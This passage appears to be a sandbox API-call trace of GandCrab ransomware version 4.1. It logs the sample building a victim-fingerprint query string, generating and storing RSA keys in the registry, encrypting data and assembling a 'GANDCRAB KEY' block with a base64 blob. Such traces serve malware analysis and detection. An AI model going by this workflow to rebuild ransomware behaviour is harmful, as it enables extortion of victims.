lpString2="dce1bb8bd2ca4def" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&" [0036.186] VirtualFree (lpAddress=0x2d50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&", lpString2="hdd" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=", lpString2="C:FIXED_549227327488/17491410944" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&" [0036.186] lstrlenW (lpString="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&") returned 179 [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944", lpString2="&id=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=", lpString2="100" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100", lpString2="&sub_id=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=", lpString2="411" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411", lpString2="&version=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=", lpString2="4.1" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=4.1") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=4.1" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=4.1", lpString2="&action=call" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=4.1&action=call") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=4.1&action=call" [0036.186] lstrlenW (lpString="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=4.1&action=call") returned 220 [0036.186] lstrlenW (lpString="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=dce1bb8bd2ca4def&hdd=C:FIXED_549227327488/17491410944&id=100&sub_id=411&version=4.1&action=call") returned 220 [0036.186] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2d50000 [0036.186] lstrcpyA (in: lpString1=0x2d50000, lpString2="jopochlen" | out: lpString1="jopochlen") returned="jopochlen" [0036.186] lstrlenA (lpString="jopochlen") returned 9 [0036.186] VirtualFree (lpAddress=0x2d50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.187] SetErrorMode (uMode=0x1) returned 0x0 [0036.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x893511, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0036.187] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0036.187] VirtualAlloc (lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0036.188] CryptAcquireContextW (in: phProv=0xdcf710, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xdcf710*=0xf6f760) returned 1 [0037.011] CryptGenKey (in: hProv=0xf6f760, Algid=0xa400, dwFlags=0x8000001, phKey=0xdcf71c | out: phKey=0xdcf71c*=0xf75750) returned 1 [0040.748] CryptExportKey (in: hKey=0xf75750, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x2e90000, pdwDataLen=0xdcf738 | out: pbData=0x2e90000*, pdwDataLen=0xdcf738*=0x114) returned 1 [0040.748] CryptExportKey (in: hKey=0xf75750, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x2ea0000, pdwDataLen=0xdcf734 | out: pbData=0x2ea0000*, pdwDataLen=0xdcf734*=0x494) returned 1 [0040.748] CryptDestroyKey (hKey=0xf75750) returned 1 [0040.748] CryptReleaseContext (hProv=0xf6f760, dwFlags=0x0) returned 1 [0040.749] VirtualAlloc (lpAddress=0x0, dwSize=0xa04, flAllocationType=0x3000, flProtect=0x4) returned 0x2ec0000 [0040.758] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\keys_data\\data", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf718 | out: phkResult=0xdcf718*=0x0) returned 0x2 [0040.758] CryptAcquireContextW (in: phProv=0xdcf658, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xdcf658*=0xf6f760) returned 1 [0040.759] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2ed0000 [0040.759] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0040.759] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0040.759] CryptGenRandom (in: hProv=0xf6f760, dwLen=0x20, pbBuffer=0xdcf6c4 | out: pbBuffer=0xdcf6c4) returned 1 [0040.759] CryptReleaseContext (hProv=0xf6f760, dwFlags=0x0) returned 1 [0040.759] VirtualFree (lpAddress=0x2ed0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.759] CryptAcquireContextW (in: phProv=0xdcf658, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xdcf658*=0xf6f760) returned 1 [0040.760] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2ed0000 [0040.760] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0040.760] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0040.760] CryptGenRandom (in: hProv=0xf6f760, dwLen=0x8, pbBuffer=0xdcf6e8 | out: pbBuffer=0xdcf6e8) returned 1 [0040.760] CryptReleaseContext (hProv=0xf6f760, dwFlags=0x0) returned 1 [0040.760] VirtualFree (lpAddress=0x2ed0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.761] CryptAcquireContextW (in: phProv=0xdcf650, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xdcf650*=0xf6f760) returned 1 [0040.768] CryptImportKey (in: hProv=0xf6f760, pbData=0xe10000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0xdcf654 | out: phKey=0xdcf654*=0xf8a408) returned 1 [0040.768] CryptGetKeyParam (in: hKey=0xf8a408, dwParam=0x8, pbData=0xdcf648, pdwDataLen=0xdcf64c, dwFlags=0x0 | out: pbData=0xdcf648*=0x800, pdwDataLen=0xdcf64c*=0x4) returned 1 [0040.769] CryptEncrypt (in: hKey=0xf8a408, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ec0004*, pdwDataLen=0xdcf6f8*=0xc8, dwBufLen=0x100 | out: pbData=0x2ec0004*, pdwDataLen=0xdcf6f8*=0x100) returned 1 [0040.770] GetLastError () returned 0x0 [0040.770] CryptDestroyKey (hKey=0xf8a408) returned 1 [0040.770] CryptReleaseContext (hProv=0xf6f760, dwFlags=0x0) returned 1 [0040.770] CryptAcquireContextW (in: phProv=0xdcf650, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xdcf650*=0xf6f760) returned 1 [0040.771] CryptImportKey (in: hProv=0xf6f760, pbData=0xe10000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0xdcf654 | out: phKey=0xdcf654*=0xf8a288) returned 1 [0040.771] CryptGetKeyParam (in: hKey=0xf8a288, dwParam=0x8, pbData=0xdcf648, pdwDataLen=0xdcf64c, dwFlags=0x0 | out: pbData=0xdcf648*=0x800, pdwDataLen=0xdcf64c*=0x4) returned 1 [0040.771] CryptEncrypt (in: hKey=0xf8a288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ec0104*, pdwDataLen=0xdcf6f4*=0xc8, dwBufLen=0x100 | out: pbData=0x2ec0104*, pdwDataLen=0xdcf6f4*=0x100) returned 1 [0040.771] GetLastError () returned 0x0 [0040.771] CryptDestroyKey (hKey=0xf8a288) returned 1 [0040.771] CryptReleaseContext (hProv=0xf6f760, dwFlags=0x0) returned 1 [0040.771] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\keys_data\\data", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0xdcf6f8, lpdwDisposition=0x0 | out: phkResult=0xdcf6f8*=0x260, lpdwDisposition=0x0) returned 0x0 [0040.772] RegSetValueExW (in: hKey=0x260, lpValueName="public", Reserved=0x0, dwType=0x3, lpData=0x2e90000*, cbData=0x114 | out: lpData=0x2e90000*) returned 0x0 [0040.772] RegSetValueExW (in: hKey=0x260, lpValueName="private", Reserved=0x0, dwType=0x3, lpData=0x2ec0000*, cbData=0x698 | out: lpData=0x2ec0000*) returned 0x0 [0040.772] RegCloseKey (hKey=0x260) returned 0x0 [0040.772] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.773] VirtualAlloc (lpAddress=0x0, dwSize=0x8cd, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0040.773] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2ed0000 [0040.773] VirtualAlloc (lpAddress=0x0, dwSize=0x1730, flAllocationType=0x3000, flProtect=0x4) returned 0x2ee0000 [0040.773] lstrcpyW (in: lpString1=0x2ee0000, lpString2="---BEGIN GANDCRAB KEY---" | out: lpString1="---BEGIN GANDCRAB KEY---") returned="---BEGIN GANDCRAB KEY---" [0040.773] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n") returned="---BEGIN GANDCRAB KEY---\r\n" [0040.774] lstrlenW (lpString="---BEGIN GANDCRAB KEY---\r\n") returned 26 [0040.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2ea0000, cbMultiByte=-1, lpWideCharStr=0x2ee0034, cchWideChar=2253 | out: lpWideCharStr="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") returned 2253 [0040.774] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB 